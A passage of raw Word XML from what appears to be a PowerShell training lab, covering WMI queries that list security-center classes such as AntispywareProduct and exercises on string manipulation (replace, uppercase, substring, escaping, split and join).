      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> –class __Namespace  -namespace root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536CFEFE" w14:textId="075CA394" w:rsidR="00C65969" w:rsidRPr="00DF2655" w:rsidRDefault="00C65969" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>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ote that is 2 underscores __</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E2429C" w14:textId="3B3904F1" w:rsidR="009419B6" w:rsidRDefault="00C65969" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>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ow a lot of information was returned. How can we cull that down? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33224944" w14:textId="79A2A97F" w:rsidR="009419B6"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 you remember select-object?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704D6D69" w14:textId="652AA5A8" w:rsidR="00C65969"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ry running 1A with a select-object case to narrow down the list to just names.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CFD4FC" w14:textId="4766F754" w:rsidR="00C65969" w:rsidRPr="005019E2"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are looking for AV – do you see any off the list that is security related?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D328AE" w14:textId="042F8E3C" w:rsidR="00C65969" w:rsidRPr="00622089" w:rsidRDefault="00C65969"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Security Center. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02790E1D" w14:textId="5AFCA355" w:rsidR="00C65969" w:rsidRDefault="00C65969" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>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Let’s look into what’s available under the security center</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D04C4BF" w14:textId="44D478AC" w:rsidR="00C65969" w:rsidRPr="00DF2655" w:rsidRDefault="00C65969" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>WMIObject</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> –namespace “root\securitycenter2” -list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291BB3BB" w14:textId="77777777" w:rsidR="00CA7F8D" w:rsidRDefault="00CA7F8D" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>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Hmm looks like there is a class called </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Antispywareproduct</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, how covenant since that is what we are looking for.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58880B13" w14:textId="4B9ED9BE" w:rsidR="008F7152" w:rsidRPr="00CA7F8D" w:rsidRDefault="00CA7F8D" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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Run </w:t>
      </w:r>
      <w:r w:rsidR="008F7152" w:rsidRPr="00CA7F8D">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008F7152" w:rsidRPr="00CA7F8D">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>WmiObject</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008F7152" w:rsidRPr="00CA7F8D">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Namespace root\securitycenter2 -class </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008F7152" w:rsidRPr="00CA7F8D">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>AntispywareProduct</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6BD6DC17" w14:textId="77777777" w:rsidR="00E4017B" w:rsidRDefault="00E4017B" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CC650C6" w14:textId="549DAC5C" w:rsidR="00E4017B" w:rsidRDefault="00E4017B"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7 </w:t>
      </w:r>
      <w:r w:rsidR="005B27AA">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Strings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F157D7E" w14:textId="77777777" w:rsidR="00E4017B" w:rsidRDefault="00E4017B" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="067C2225" w14:textId="77777777" w:rsidR="00E4017B" w:rsidRDefault="00E4017B"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633690F9" w14:textId="77777777" w:rsidR="00E4017B" w:rsidRDefault="00E4017B" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F648EC0" w14:textId="003A060D" w:rsidR="00E4017B" w:rsidRDefault="008E6D16" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA4184">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Learn to manipulate strings in order to get the results we are after.</w:t>
      </w:r>
      <w:r w:rsidR="00FC3E6A">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> In this section we will do the following actions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D06C344" w14:textId="09E3B123" w:rsidR="00FC3E6A" w:rsidRDefault="00FC3E6A" w:rsidP="00FC3E6A">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et a variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AC5FCA" w14:textId="7F0F3CA4" w:rsidR="00FC3E6A" w:rsidRPr="00FC3E6A" w:rsidRDefault="00FC3E6A" w:rsidP="00FC3E6A">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various methods against that variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC543FB" w14:textId="77777777" w:rsidR="00E4017B" w:rsidRDefault="00E4017B" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DCD9AB3" w14:textId="77777777" w:rsidR="00E4017B" w:rsidRDefault="00E4017B"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73B48670" w14:textId="77777777" w:rsidR="00E4017B" w:rsidRDefault="00E4017B" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1344D1F3" w14:textId="602ED1FF" w:rsidR="008E6D16" w:rsidRDefault="008E6D16"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sign a string to a variable and leverage the object nature of PS to manipulate the string</w:t>
      </w:r>
      <w:r w:rsidR="00CA4184">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. We will use the following cmdlets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523706A2" w14:textId="1FDABB6D" w:rsidR="008E6D16" w:rsidRDefault="008E6D16"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one really.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E656D2" w14:textId="77777777" w:rsidR="00E4017B" w:rsidRDefault="00E4017B" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A9DA3E8" w14:textId="2ED5E7AA" w:rsidR="00E4017B" w:rsidRPr="003A12DF" w:rsidRDefault="00E4017B" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A12DF">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Estimated completion </w:t>
      </w:r>
      <w:r w:rsidRPr="003A12DF">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t xml:space="preserve">time: </w:t>
      </w:r>
      <w:r w:rsidR="002F65CA">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>5-10</w:t>
      </w:r>
      <w:r w:rsidRPr="003A12DF">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> minutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA5F197" w14:textId="77777777" w:rsidR="00E4017B" w:rsidRDefault="00E4017B" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63DC1844" w14:textId="3896733E" w:rsidR="002F65CA" w:rsidRPr="00622089" w:rsidRDefault="002F65CA"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rsidR="007F6D8A">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Create the variable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9BD80D" w14:textId="3D96EF67" w:rsidR="002F65CA" w:rsidRDefault="007F6D8A" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>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reate a variable $a and assign it a value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A1BEF0" w14:textId="46543478" w:rsidR="00945FF5" w:rsidRPr="00DF2655"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the quick brown fox”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624C3083" w14:textId="7B6408B2" w:rsidR="002F65CA" w:rsidRDefault="007F6D8A" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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display the variable type $a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492ED198" w14:textId="25AF3D4D" w:rsidR="00945FF5" w:rsidRDefault="00945FF5" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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hat is the difference between a single quote and double quote in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A9C31E" w14:textId="5FBE031D" w:rsidR="00945FF5"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ype: “pet $a”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178A56CA" w14:textId="02548E59" w:rsidR="00945FF5" w:rsidRPr="005019E2"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ype: ‘pet $a’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEDEDC1" w14:textId="7078CD65" w:rsidR="002F65CA" w:rsidRPr="00622089" w:rsidRDefault="002F65CA"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7F6D8A">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Manipulations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C6F1FF" w14:textId="4FB59962" w:rsidR="007F6D8A" w:rsidRDefault="007F6D8A" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>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oops it was a dog not a fox. Try and replace fox with dog.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369A121C" w14:textId="75A5CC92" w:rsidR="007F6D8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t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a.Replace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – what parameters do you need?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F04764A" w14:textId="6D1AB053" w:rsidR="007F6D8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as it </w:t>
      </w:r>
      <w:r w:rsidR="003F32DA">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>permanent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>? Type $</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> again to see… why or why not?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EB5BEF" w14:textId="642C8504" w:rsidR="003F32DA" w:rsidRPr="007F6D8A" w:rsidRDefault="003F32D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it was</w:t>
      </w:r>
      <w:r w:rsidR="00962E4A">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>n’t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> permanent make it so.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA87B08" w14:textId="324F91C6" w:rsidR="002F65CA" w:rsidRDefault="007F6D8A" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>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e the punctuation is way off. We forgot to use uppercase. How would we do that?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D84D9F1" w14:textId="41E472E8" w:rsidR="002F65C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t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a.Toupper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – try it did it work? ALMOST.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412C2D31" w14:textId="36360F25" w:rsidR="00997F87" w:rsidRDefault="00997F87"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need to manipulate the first string only. Look at substring can we use that? That gets us the first letter – can we get the rest?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EFD356" w14:textId="5E63389F" w:rsidR="00997F87" w:rsidRDefault="00997F87"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How would we add a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>period.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7D508E62" w14:textId="74F0AF3B" w:rsidR="00997F87" w:rsidRPr="00622089" w:rsidRDefault="00997F8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3: Escapes. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16734B0D" w14:textId="340F9944" w:rsidR="00997F87" w:rsidRDefault="00997F87" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>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ome program</w:t>
      </w:r>
      <w:r w:rsidR="003F32DA">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> read entries </w:t>
      </w:r>
      <w:r w:rsidR="003F32DA">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">weird and need them escaped. A </w:t>
      </w:r>
      <w:r w:rsidR="003F32DA">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>common</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> character that needs escaping is the backslash \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6012F887" w14:textId="2A831678" w:rsidR="00997F87" w:rsidRDefault="00997F87"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sign a path string “c:\test” to variable b.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285DD736" w14:textId="369436C4" w:rsidR="00997F87" w:rsidRDefault="00997F87"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Using the split </w:t>
      </w:r>
      <w:r w:rsidR="003F32DA">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> split the </w:t>
      </w:r>
      <w:r w:rsidR="003F32DA">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>string into two parts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558B5C5D" w14:textId="78459F71" w:rsidR="00997F87" w:rsidRPr="00DB1131" w:rsidRDefault="003F32DA"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ing the Join functions join the two parts together with “\\” (an escaped \)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6006F3D0" w14:textId="77777777" w:rsidR="00E4017B" w:rsidRDefault="00E4017B" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="567946FA" w14:textId="42053882" w:rsidR="00301ED8" w:rsidRDefault="00301ED8"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8 </w:t>
      </w:r>
      <w:r w:rsidR="003A0131">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Stop it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A425E5" w14:textId="77777777" w:rsidR="00301ED8" w:rsidRDefault="00301ED8" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="254E899A" w14:textId="77777777" w:rsidR="00301ED8" w:rsidRPr="00082B5F" w:rsidRDefault="00301ED8" w:rsidP="00082B5F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00082B5F">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Objectives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51019064" w14:textId="77777777" w:rsidR="00301ED8" w:rsidRDefault="00301ED8" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
